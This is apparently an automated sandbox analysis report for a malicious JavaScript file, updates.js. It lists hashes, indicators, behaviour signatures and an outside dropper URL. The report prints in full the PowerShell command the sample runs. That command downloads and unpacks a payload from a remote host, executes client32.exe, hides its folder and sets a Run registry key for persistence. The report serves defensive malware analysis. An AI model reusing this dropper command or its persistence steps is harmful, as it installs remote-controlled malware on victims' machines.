Analysis
-
max time kernel
14s -
max time network
22s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
16-07-2024 20:28
General
-
Target
updates.js
-
Size
7.3MB
-
MD5
2826502a26311bbe395d5ab565114330
-
SHA1
1764ea00a1262c07b13d0c4b059e88e57650dfc4
-
SHA256
65ab8ed555628693952b1fc385feca757b0a689981128d848f2c39a52e7da1e9
-
SHA512
578eaf54cab019a8f1b166b1da0b5580ee8081bfd1629fe938e366ac855b501016d84e5567008069d900a970247577ae998191d028ce5904dd7c0a7bee451239
-
SSDEEP
49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQu:1
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://dfwreds.com/data.php?14991
exe.dropper
http://dfwreds.com/data.php?14991
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\updates.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB